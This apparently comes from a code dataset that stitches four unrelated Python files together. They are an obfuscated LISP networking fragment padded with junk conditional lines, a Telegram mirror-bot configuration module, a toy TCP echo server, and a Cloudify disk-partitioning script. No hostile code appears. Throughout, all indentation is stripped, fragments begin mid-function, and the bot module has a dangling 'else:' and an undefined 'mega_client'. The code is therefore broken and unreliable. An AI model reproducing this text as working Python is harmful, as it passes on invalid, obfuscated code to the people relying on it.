if 15 - 15: II111iiii + iIii1I11I1II1
if 100 - 100: OOooOOo
if 43 - 43: OoO0O00 + I1Ii111 + OoOoOO00
if 78 - 78: I11i
lisp_geid . instance_id = seid . instance_id
if 30 - 30: iIii1I11I1II1
if 74 - 74: I1IiiI - Oo0Ooo - i1IIi . iIii1I11I1II1 - I11i
if 57 - 57: I1IiiI - i11iIiiIii - I1ii11iIi11i
if 49 - 49: i1IIi . O0 % Ii1I * i1IIi
if 39 - 39: I1ii11iIi11i
Ii1Iii = lisp_process_igmp_packet ( igmp )
if ( type ( Ii1Iii ) == bool ) : return
if 74 - 74: II111iiii % oO0o * Oo0Ooo / iIii1I11I1II1
for iI1Iii1i1 , OOo0oOOO0 , IiI11III in Ii1Iii :
if ( iI1Iii1i1 != None ) : continue
if 81 - 81: II111iiii + OoOoOO00 * O0
if 64 - 64: iIii1I11I1II1 * Ii1I
if 5 - 5: I11i . I11i / i1IIi - o0oOOo0O0Ooo % Oo0Ooo
if 85 - 85: OOooOOo
lisp_geid . store_address ( OOo0oOOO0 )
o0O000O , oOo0oo , IIIi1i1iIIIi = lisp_allow_gleaning ( seid , lisp_geid , rloc )
if ( o0O000O == False ) : continue
if 32 - 32: iII111i
if ( IiI11III ) :
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , encap_port ,
True )
else :
lisp_remove_gleaned_multicast ( seid , lisp_geid )
if 27 - 27: iIii1I11I1II1 - iII111i
if 68 - 68: oO0o + OoooooooOO - i1IIi * OoOoOO00 % Oo0Ooo
if 19 - 19: IiII * Oo0Ooo + I1IiiI * I1Ii111 % iIii1I11I1II1
if 15 - 15: II111iiii % OoO0O00 % Oo0Ooo + I1Ii111
if 54 - 54: I1Ii111 + OOooOOo
if 6 - 6: Ii1I
if 8 - 8: OoO0O00
if 91 - 91: Ii1I
if 12 - 12: OoooooooOO + i11iIiiIii
if 63 - 63: OOooOOo . i11iIiiIii
if 50 - 50: IiII % i11iIiiIii - iII111i . OoOoOO00 / Oo0Ooo
if 30 - 30: Oo0Ooo . II111iiii + OoooooooOO % OoO0O00 * ooOoO0o * iIii1I11I1II1
def lisp_is_json_telemetry ( json_string ) :
try :
i11IIIi1I1I = json . loads ( json_string )
if ( type ( i11IIIi1I1I ) != dict ) : return ( None )
except :
lprint ( "Could not decode telemetry json: {}" . format ( json_string ) )
return ( None )
if 91 - 91: OoooooooOO
if 86 - 86: iII111i / OoooooooOO - I1ii11iIi11i
if ( i11IIIi1I1I . has_key ( "type" ) == False ) : return ( None )
if ( i11IIIi1I1I . has_key ( "sub-type" ) == False ) : return ( None )
if ( i11IIIi1I1I [ "type" ] != "telemetry" ) : return ( None )
if ( i11IIIi1I1I [ "sub-type" ] != "timestamps" ) : return ( None )
return ( i11IIIi1I1I )
if 63 - 63: ooOoO0o % Ii1I * I1IiiI
if 48 - 48: iII111i - iII111i - o0oOOo0O0Ooo + ooOoO0o - o0oOOo0O0Ooo / Ii1I
if 43 - 43: I1IiiI + Ii1I
if 37 - 37: OoOoOO00 - OoooooooOO . ooOoO0o - IiII % iIii1I11I1II1 . iIii1I11I1II1
if 64 - 64: OoOoOO00 + iII111i % I1Ii111 - OOooOOo + O0
if 83 - 83: I1Ii111 + I1Ii111
if 43 - 43: oO0o * i1IIi * Ii1I . iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: I1IiiI . i1IIi * OoOoOO00 / OOooOOo
if 50 - 50: II111iiii . OoO0O00
if 60 - 60: I11i . iIii1I11I1II1
if 41 - 41: II111iiii / I1IiiI
if 2 - 2: IiII / OoOoOO00 + I11i
def lisp_encode_telemetry ( json_string , ii = "?" , io = "?" , ei = "?" , eo = "?" ) :
i11IIIi1I1I = lisp_is_json_telemetry ( json_string )
if ( i11IIIi1I1I == None ) : return ( json_string )
if 3 - 3: OoooooooOO + Oo0Ooo + OOooOOo
if ( i11IIIi1I1I [ "itr-in" ] == "?" ) : i11IIIi1I1I [ "itr-in" ] = ii
if ( i11IIIi1I1I [ "itr-out" ] == "?" ) : i11IIIi1I1I [ "itr-out" ] = io
if ( i11IIIi1I1I [ "etr-in" ] == "?" ) : i11IIIi1I1I [ "etr-in" ] = ei
if ( i11IIIi1I1I [ "etr-out" ] == "?" ) : i11IIIi1I1I [ "etr-out" ] = eo
json_string = json . dumps ( i11IIIi1I1I )
return ( json_string )
if 20 - 20: Ii1I - oO0o - OoO0O00 + I1ii11iIi11i % OoO0O00 . i1IIi
if 2 - 2: ooOoO0o * IiII . Ii1I
if 69 - 69: IiII % i1IIi
if 17 - 17: o0oOOo0O0Ooo . OoO0O00 * ooOoO0o * II111iiii - OoooooooOO % iII111i
if 47 - 47: I1IiiI * iIii1I11I1II1 - I11i - o0oOOo0O0Ooo
if 47 - 47: IiII + OoO0O00 % ooOoO0o - iII111i - IiII - oO0o
if 63 - 63: OoooooooOO / I1Ii111
if 90 - 90: I1Ii111 . i11iIiiIii - iIii1I11I1II1 + I1Ii111
if 67 - 67: IiII - I1ii11iIi11i + ooOoO0o . iIii1I11I1II1 . IiII
if 13 - 13: I1IiiI / i11iIiiIii % iIii1I11I1II1 - Oo0Ooo . i11iIiiIii + I1IiiI
if 77 - 77: o0oOOo0O0Ooo / II111iiii + i11iIiiIii % Ii1I . iIii1I11I1II1
if 66 - 66: iII111i / oO0o - OoO0O00 . Oo0Ooo
def lisp_decode_telemetry ( json_string ) :
i11IIIi1I1I = lisp_is_json_telemetry ( json_string )
if ( i11IIIi1I1I == None ) : return ( { } )
return ( i11IIIi1I1I )
if 31 - 31: IiII % O0
if 46 - 46: iIii1I11I1II1 - OoooooooOO . oO0o % iIii1I11I1II1 / i1IIi + Ii1I
if 5 - 5: I1ii11iIi11i % II111iiii
if 17 - 17: i11iIiiIii - II111iiii / O0 % OoO0O00 . Oo0Ooo + IiII
if 60 - 60: I11i % I1IiiI
if 99 - 99: oO0o . OOooOOo % iII111i * Ii1I
if 98 - 98: Oo0Ooo * O0 + i1IIi
if 41 - 41: i1IIi % OoO0O00 * iIii1I11I1II1
if 2 - 2: I1ii11iIi11i * iII111i . iIii1I11I1II1 * Oo0Ooo
def lisp_telemetry_configured ( ) :
if ( lisp_json_list . has_key ( "telemetry" ) == False ) : return ( None )
if 34 - 34: i11iIiiIii % O0 . I1IiiI / ooOoO0o + OoO0O00
o0Ooo = lisp_json_list [ "telemetry" ] . json_string
if ( lisp_is_json_telemetry ( o0Ooo ) == None ) : return ( None )
if 28 - 28: Ii1I / iIii1I11I1II1
return ( o0Ooo )
if 41 - 41: iIii1I11I1II1
if 57 - 57: I1Ii111 * o0oOOo0O0Ooo - o0oOOo0O0Ooo * I11i
if 89 - 89: Ii1I % O0
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
__init__.py
|
import faulthandler
import logging
import os
import random
import socket
import string
import threading
import time
import requests
import aria2p
import telegram.ext as tg
from dotenv import load_dotenv
from pyrogram import Client
import psycopg2
from psycopg2 import Error
faulthandler.enable()
import subprocess
from megasdkrestclient import MegaSdkRestClient
from megasdkrestclient import errors as mega_err
socket.setdefaulttimeout(600)
botStartTime = time.time()
if os.path.exists("log.txt"):
with open("log.txt", "r+") as f:
f.truncate(0)
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
handlers=[logging.FileHandler("log.txt"), logging.StreamHandler()],
level=logging.INFO,
)
#Config And Heroku Support
CONFIG_FILE_URL = os.environ.get('CONFIG_FILE_URL')
if CONFIG_FILE_URL:
if len(CONFIG_FILE_URL) == 0:
CONFIG_FILE_URL = None
if CONFIG_FILE_URL is not None:
logging.error("Downloading config.env From Provided URL")
if os.path.isfile("config.env"):
logging.error("Updating config.env")
os.remove("config.env")
res = requests.get(CONFIG_FILE_URL)
if res.status_code == 200:
with open('config.env', 'wb+') as f:
f.write(res.content)
f.close()
else:
logging.error(f"Failed to download config.env {res.status_code}")
load_dotenv("config.env")
Interval = []
def mktable():
try:
conn = psycopg2.connect(DB_URI)
cur = conn.cursor()
sql = "CREATE TABLE users (uid bigint, sudo boolean DEFAULT FALSE);"
cur.execute(sql)
conn.commit()
logging.info("Table Created!")
except Error as e:
logging.error(e)
exit(1)
def getConfig(name: str):
return os.environ[name]
LOGGER = logging.getLogger(__name__)
try:
if bool(getConfig("_____REMOVE_THIS_LINE_____")):
logging.error("The README.md file there to be read! Exiting now!")
exit()
except KeyError:
pass
#RECURSIVE SEARCH
DRIVE_NAME = []
DRIVE_ID = []
UNI_INDEX_URL = []
if os.path.exists('drive_folder'):
with open('drive_folder', 'r+') as f:
lines = f.readlines()
for line in lines:
temp = line.strip().split()
DRIVE_NAME.append(temp[0].replace("_", " "))
DRIVE_ID.append(temp[1])
try:
UNI_INDEX_URL.append(temp[2])
except IndexError as e:
UNI_INDEX_URL.append(None)
try:
RECURSIVE_SEARCH = getConfig("RECURSIVE_SEARCH")
if RECURSIVE_SEARCH.lower() == "true":
RECURSIVE_SEARCH = True
else:
RECURSIVE_SEARCH = False
except KeyError:
RECURSIVE_SEARCH = False
if RECURSIVE_SEARCH:
if DRIVE_ID:
pass
else :
LOGGER.error("Fill Drive_Folder File For Multi Drive Search!")
exit(1)
aria2 = aria2p.API(
aria2p.Client(
host="http://localhost",
port=6800,
secret="",
)
)
def aria2c_init():
try:
if not os.path.isfile(".restartmsg"):
logging.info("Initializing Aria2c")
link = "https://releases.ubuntu.com/21.10/ubuntu-21.10-desktop-amd64.iso.torrent"
path = "/usr/src/app/"
aria2.add_uris([link], {'dir': path})
time.sleep(3)
downloads = aria2.get_downloads()
time.sleep(30)
for download in downloads:
aria2.remove([download], force=True, files=True)
except Exception as e:
logging.error(f"Aria2c initializing error: {e}")
pass
threading.Thread(target=aria2c_init).start()
time.sleep(0.5)
DOWNLOAD_DIR = None
BOT_TOKEN = None
download_dict_lock = threading.Lock()
status_reply_dict_lock = threading.Lock()
# Key: update.effective_chat.id
# Value: telegram.Message
status_reply_dict = {}
# Key: update.message.message_id
# Value: An object of Status
download_dict = {}
AS_DOC_USERS = set()
AS_MEDIA_USERS = set()
# Stores list of users and chats the bot is authorized to use in
AUTHORIZED_CHATS = set()
SUDO_USERS = set()
LOGS_CHATS = set()
if os.path.exists('sudo_users.txt'):
with open('sudo_users.txt', 'r+') as f:
lines = f.readlines()
for line in lines:
SUDO_USERS.add(int(line.split()[0]))
try:
schats = getConfig('SUDO_USERS')
schats = schats.split(" ")
for chats in schats:
SUDO_USERS.add(int(chats))
except:
pass
if os.path.exists("authorized_chats.txt"):
with open("authorized_chats.txt", "r+") as f:
lines = f.readlines()
for line in lines:
# LOGGER.info(line.split())
AUTHORIZED_CHATS.add(int(line.split()[0]))
try:
achats = getConfig("AUTHORIZED_CHATS")
achats = achats.split(" ")
for chats in achats:
AUTHORIZED_CHATS.add(int(chats))
except:
pass
if os.path.exists("logs_chat.txt"):
with open("logs_chat.txt", "r+") as f:
lines = f.readlines()
for line in lines:
# LOGGER.info(line.split())
LOGS_CHATS.add(int(line.split()[0]))
try:
achats = getConfig("LOGS_CHATS")
achats = achats.split(" ")
for chats in achats:
LOGS_CHATS.add(int(chats))
except:
logging.warning('Logs Chat Details not provided!')
pass
try:
PHPSESSID = getConfig('PHPSESSID')
CRYPT = getConfig('CRYPT')
if len(PHPSESSID) == 0 or len(CRYPT) == 0:
raise KeyError
except KeyError:
PHPSESSID = None
CRYPT = None
try:
BOT_TOKEN = getConfig("BOT_TOKEN")
parent_id = getConfig("GDRIVE_FOLDER_ID")
DOWNLOAD_DIR = getConfig("DOWNLOAD_DIR")
if not DOWNLOAD_DIR.endswith("/"):
DOWNLOAD_DIR = DOWNLOAD_DIR + "/"
DOWNLOAD_STATUS_UPDATE_INTERVAL = int(getConfig("DOWNLOAD_STATUS_UPDATE_INTERVAL"))
OWNER_ID = int(getConfig("OWNER_ID"))
AUTO_DELETE_MESSAGE_DURATION = int(getConfig("AUTO_DELETE_MESSAGE_DURATION"))
TELEGRAM_API = getConfig("TELEGRAM_API")
TELEGRAM_HASH = getConfig("TELEGRAM_HASH")
except KeyError:
LOGGER.error("One or more env variables missing! Exiting now")
exit(1)
try:
DB_URI = getConfig('DATABASE_URL')
if len(DB_URI) == 0:
raise KeyError
except KeyError:
DB_URI = None
if DB_URI is not None:
try:
conn = psycopg2.connect(DB_URI)
cur = conn.cursor()
sql = "SELECT * from users;"
cur.execute(sql)
rows = cur.fetchall() #returns a list ==> (uid, sudo)
for row in rows:
AUTHORIZED_CHATS.add(row[0])
if row[1]:
SUDO_USERS.add(row[0])
except Error as e:
if 'relation "users" does not exist' in str(e):
mktable()
else:
LOGGER.error(e)
exit(1)
finally:
cur.close()
conn.close()
LOGGER.info("Generating USER_SESSION_STRING")
app = Client(
":memory:", api_id=int(TELEGRAM_API), api_hash=TELEGRAM_HASH, bot_token=BOT_TOKEN
)
try:
MEGA_KEY = getConfig("MEGA_KEY")
except KeyError:
MEGA_KEY = None
LOGGER.info("MEGA API KEY NOT AVAILABLE")
try:
MEGA_USERNAME = getConfig("MEGA_USERNAME")
MEGA_PASSWORD = getConfig("MEGA_PASSWORD")
if len(MEGA_USERNAME) > 0 and len(MEGA_PASSWORD) > 0:
try:
mega_client.login(MEGA_USERNAME, MEGA_PASSWORD)
except mega_err.MegaSdkRestClientException as e:
logging.error(e.message["message"])
exit(0)
else:
LOGGER.info(
"Mega API KEY provided but credentials not provided. Starting mega in anonymous mode!"
)
MEGA_USERNAME = None
MEGA_PASSWORD = None
except KeyError:
LOGGER.info(
"Mega API KEY provided but credentials not provided. Starting mega in anonymous mode!"
)
MEGA_USERNAME = None
MEGA_PASSWORD = None
else:
MEGA_USERNAME = None
MEGA_PASSWORD = None
try:
INDEX_URL = getConfig("INDEX_URL")
if len(INDEX_URL) == 0:
INDEX_URL = None
except KeyError:
INDEX_URL = None
try:
BUTTON_THREE_NAME = getConfig("BUTTON_THREE_NAME")
BUTTON_THREE_URL = getConfig("BUTTON_THREE_URL")
if len(BUTTON_THREE_NAME) == 0 or len(BUTTON_THREE_URL) == 0:
raise KeyError
except KeyError:
BUTTON_THREE_NAME = None
BUTTON_THREE_URL = None
try:
BUTTON_FOUR_NAME = getConfig("BUTTON_FOUR_NAME")
BUTTON_FOUR_URL = getConfig("BUTTON_FOUR_URL")
if len(BUTTON_FOUR_NAME) == 0 or len(BUTTON_FOUR_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FOUR_NAME = None
BUTTON_FOUR_URL = None
try:
BUTTON_FIVE_NAME = getConfig("BUTTON_FIVE_NAME")
BUTTON_FIVE_URL = getConfig("BUTTON_FIVE_URL")
if len(BUTTON_FIVE_NAME) == 0 or len(BUTTON_FIVE_URL) == 0:
raise KeyError
except KeyError:
BUTTON_FIVE_NAME = None
BUTTON_FIVE_URL = None
try:
IS_TEAM_DRIVE = getConfig("IS_TEAM_DRIVE")
IS_TEAM_DRIVE = IS_TEAM_DRIVE.lower() == "true"
except KeyError:
IS_TEAM_DRIVE = False
try:
USE_SERVICE_ACCOUNTS = getConfig("USE_SERVICE_ACCOUNTS")
if USE_SERVICE_ACCOUNTS.lower() == "true":
USE_SERVICE_ACCOUNTS = True
else:
USE_SERVICE_ACCOUNTS = False
except KeyError:
USE_SERVICE_ACCOUNTS = False
try:
BLOCK_MEGA_LINKS = getConfig("BLOCK_MEGA_LINKS")
BLOCK_MEGA_LINKS = BLOCK_MEGA_LINKS.lower() == "true"
except KeyError:
BLOCK_MEGA_LINKS = False
try:
SHORTENER = getConfig("SHORTENER")
SHORTENER_API = getConfig("SHORTENER_API")
if len(SHORTENER) == 0 or len(SHORTENER_API) == 0:
raise KeyError
except KeyError:
SHORTENER = None
SHORTENER_API = None
IGNORE_PENDING_REQUESTS = False
try:
if getConfig("IGNORE_PENDING_REQUESTS").lower() == "true":
IGNORE_PENDING_REQUESTS = True
except KeyError:
pass
try:
TG_SPLIT_SIZE = getConfig('TG_SPLIT_SIZE')
if len(TG_SPLIT_SIZE) == 0 or int(TG_SPLIT_SIZE) > 2097152000:
raise KeyError
else:
TG_SPLIT_SIZE = int(TG_SPLIT_SIZE)
except KeyError:
TG_SPLIT_SIZE = 2097152000
try:
AS_DOCUMENT = getConfig('AS_DOCUMENT')
AS_DOCUMENT = AS_DOCUMENT.lower() == 'true'
except KeyError:
AS_DOCUMENT = False
#VIEW_LINK
try:
VIEW_LINK = getConfig('VIEW_LINK')
if VIEW_LINK.lower() == 'true':
VIEW_LINK = True
else:
VIEW_LINK = False
except KeyError:
VIEW_LINK = False
#CLONE
try:
CLONE_LIMIT = getConfig('CLONE_LIMIT')
if len(CLONE_LIMIT) == 0:
CLONE_LIMIT = None
except KeyError:
CLONE_LIMIT = None
try:
STOP_DUPLICATE_CLONE = getConfig('STOP_DUPLICATE_CLONE')
if STOP_DUPLICATE_CLONE.lower() == 'true':
STOP_DUPLICATE_CLONE = True
else:
STOP_DUPLICATE_CLONE = False
except KeyError:
STOP_DUPLICATE_CLONE = False
#HEROKUSUPPORT
try:
TOKEN_PICKLE_URL = getConfig('TOKEN_PICKLE_URL')
if len(TOKEN_PICKLE_URL) == 0:
TOKEN_PICKLE_URL = None
else:
res = requests.get(TOKEN_PICKLE_URL)
if res.status_code == 200:
with open('token.pickle', 'wb+') as f:
f.write(res.content)
f.close()
else:
logging.error(f"Failed to download token.pickle {res.status_code}")
raise KeyError
except KeyError:
pass
try:
ACCOUNTS_ZIP_URL = getConfig('ACCOUNTS_ZIP_URL')
if len(ACCOUNTS_ZIP_URL) == 0:
ACCOUNTS_ZIP_URL = None
else:
res = requests.get(ACCOUNTS_ZIP_URL)
if res.status_code == 200:
with open('accounts.zip', 'wb+') as f:
f.write(res.content)
f.close()
else:
logging.error(f"Failed to download accounts.zip {res.status_code}")
raise KeyError
subprocess.run(["unzip", "-q", "-o", "accounts.zip"])
os.remove("accounts.zip")
except KeyError:
pass
#uptobox
try:
UPTOBOX_TOKEN = getConfig('UPTOBOX_TOKEN')
if len(UPTOBOX_TOKEN) == 0:
raise KeyError
except KeyError:
UPTOBOX_TOKEN = None
updater = tg.Updater(token=BOT_TOKEN)
bot = updater.bot
dispatcher = updater.dispatcher
|
server-practice.py
|
# -*- coding: utf-8 -*-
import socket, threading, time
#TCP socket based on ipv4
#server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#listening on port
s.bind(('127.0.0.1', 9999))
s.listen(5)
print("Waiting for connection...")
def tcplink(sock, addr):
print('Accept new connection from %s:%s...' % addr)
sock.send(b'Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if not data or data.decode('utf-8') == 'exit':
break
sock.send(('Hello, %s!' %data.decode('utf-8')).encode('utf-8'))
sock.close()
print('Connection from %s:%s closed.' % addr)
while True:
#receive a new connect
sock, addr = s.accept()
#make a new thread dispose TCPlink
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
|
_a4c_pre_configure_source.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['TARGET_NODE'] = ctx.target.node.id
env_map['TARGET_INSTANCE'] = ctx.target.instance.id
env_map['TARGET_INSTANCES'] = get_instance_list(ctx.target.node.id)
env_map['SOURCE_NODE'] = ctx.source.node.id
env_map['SOURCE_INSTANCE'] = ctx.source.instance.id
env_map['SOURCE_INSTANCES'] = get_instance_list(ctx.source.node.id)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx.source, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx.source)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx.source)
env_map['PARTITION_TYPE'] = r'83'
env_map['VOLUME_ID'] = ''
env_map['DEVICE'] = get_attribute(ctx.target, 'device')
other_instances_map = _all_instances_get_attribute(ctx.target, 'device')
if other_instances_map is not None:
for other_instances_key in other_instances_map:
env_map[other_instances_key + 'DEVICE'] = other_instances_map[other_instances_key]
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
operationOutputNames = 'PARTITION_NAME'
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/LinuxFileSystem_3_CBS3/linuxPartitionCBS3/tosca.interfaces.relationship.Configure/pre_configure_source/fdisk.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.source.instance.runtime_properties['_a4c_OO:tosca.interfaces.relationship.Configure:pre_configure_source:{0}'.format(k)] = v
